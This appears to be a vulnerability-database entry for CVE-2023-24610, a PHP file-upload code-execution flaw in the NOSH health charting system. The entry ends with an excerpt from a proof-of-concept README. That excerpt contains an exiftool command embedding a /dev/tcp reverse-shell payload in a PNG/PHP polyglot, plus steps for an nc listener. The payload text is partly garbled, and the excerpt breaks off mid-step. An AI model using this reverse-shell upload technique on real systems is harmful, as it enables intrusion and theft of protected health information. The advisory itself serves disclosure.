8.8
CVSSv3

CVE-2023-24610

Published: 01/02/2023 Updated: 08/02/2023
CVSS v3 Base Score: 8.8 | Impact Score: 5.9 | Exploitability Score: 2.8
VMScore: 0

Vulnerability Summary

NOSH 4a5cfdb allows remote authenticated users to execute PHP arbitrary code via the "practice logo" upload feature. The client-side checks can be bypassed. This may allow malicious users to steal Protected Health Information because the product is for health charting.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

nosh chartingsystem project nosh chartingsystem 2021-03-13

Github Repositories

This is a proof of concept for CVE-2023-24610

CVE-2023-24610 This is a proof of concept for CVE-2023-24610 We start by creating a polyglot file using exiftool: exiftool -Comment="/dev/tcp/1721701/8888 <&1\''); ?>" avatarpng -o polyglotphp We change the file to png so it will pass the front-end check After that, we start a nc listener on port 8888 to receive the shell Next